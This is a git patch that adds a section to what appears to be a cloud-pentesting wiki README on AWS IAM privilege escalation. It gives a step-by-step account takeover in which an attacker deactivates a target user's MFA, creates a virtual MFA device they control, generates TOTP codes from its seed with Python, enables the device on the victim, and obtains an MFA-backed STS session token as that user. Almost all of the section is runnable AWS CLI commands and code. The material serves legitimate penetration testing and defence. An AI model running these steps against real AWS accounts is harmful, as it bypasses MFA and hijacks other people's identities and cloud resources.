From 0cfe8fc87dced0ad4bb9dd4b15d63bc8f3203ba7 Mon Sep 17 00:00:00 2001 From: Jaime Polop <117489620+JaimePolop@users.noreply.github.com> Date: Fri, 20 Feb 2026 16:28:54 +0100 Subject: [PATCH] Update README.md --- .../aws-iam-privesc/README.md | 76 +++++++++++++++++++ 1 file changed, 76 insertions(+) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md index 532344b50..2dd2cfa9a 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md @@ -620,6 +620,82 @@ aws iam put-role-permissions-boundary \ --permissions-boundary arn:aws:iam::111122223333:policy/BoundaryPolicy ``` +### `iam:CreateVirtualMFADevice`, `iam:EnableMFADevice`, CreateVirtualMFADevice & `sts:GetSessionToken` +The attacker creates a virtual MFA device under their control and attaches it to the target IAM user, replacing or bypassing the victim’s original MFA. Using the seed of this attacker-controlled MFA, they generate valid one-time passwords and request an MFA-authenticated session token via STS. This allows the attacker to satisfy the MFA requirement and obtain temporary credentials as the victim, effectively completing the account takeover even though MFA is enforced. + +If the target user already has MFA, deactivate it (`iam:DeactivateMFADevice`): + +```bash +aws iam deactivate-mfa-device \ + --user-name TARGET_USER \ + --serial-number arn:aws:iam::ACCOUNT_ID:mfa/EXISTING_DEVICE_NAME +``` + +Create a new virtual MFA device (writes the seed to a file) + +```bash +aws iam create-virtual-mfa-device \ + --virtual-mfa-device-name VIRTUAL_MFA_DEVICE_NAME \ + --bootstrap-method Base32StringSeed \ + --outfile /tmp/mfa-seed.txt +``` + +Generate two consecutive TOTP codes from the seed file: + +```python +import base64, hmac, hashlib, struct, time + +seed = open("/tmp/mfa-seed.txt").read().strip() +seed = seed + ("=" * ((8 - (len(seed) % 8)) % 8)) +key = base64.b32decode(seed, casefold=True) + +def totp(t): + counter = int(t / 30) + msg = struct.pack(">Q", counter) + h = hmac.new(key, msg, hashlib.sha1).digest() + o = h[-1] & 0x0F + code = (struct.unpack(">I", h[o:o+4])[0] & 0x7fffffff) % 1000000 + return f"{code:06d}" + +now = int(time.time()) +print(totp(now)) +print(totp(now + 30)) +``` + +Enable MFA device on the target user, replace MFA_SERIAL_ARN, CODE1, CODE2: + +```bash +aws iam enable-mfa-device \ + --user-name TARGET_USER \ + --serial-number MFA_SERIAL_ARN \ + --authentication-code1 CODE1 \ + --authentication-code2 CODE2 +``` + +Generate a current token code (for STS) +```python +import base64, hmac, hashlib, struct, time + +seed = open("/tmp/mfa-seed.txt").read().strip() +seed = seed + ("=" * ((8 - (len(seed) % 8)) % 8)) +key = base64.b32decode(seed, casefold=True) + +counter = int(time.time() / 30) +msg = struct.pack(">Q", counter) +h = hmac.new(key, msg, hashlib.sha1).digest() +o = h[-1] & 0x0F +code = (struct.unpack(">I", h[o:o+4])[0] & 0x7fffffff) % 1000000 +print(f"{code:06d}") +``` + +Copy the printed value as TOKEN_CODE and request an MFA-backed session token (STS): + +```bash +aws sts get-session-token \ + --serial-number MFA_SERIAL_ARN \ + --token-code TOKEN_CODE +``` + ## References - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)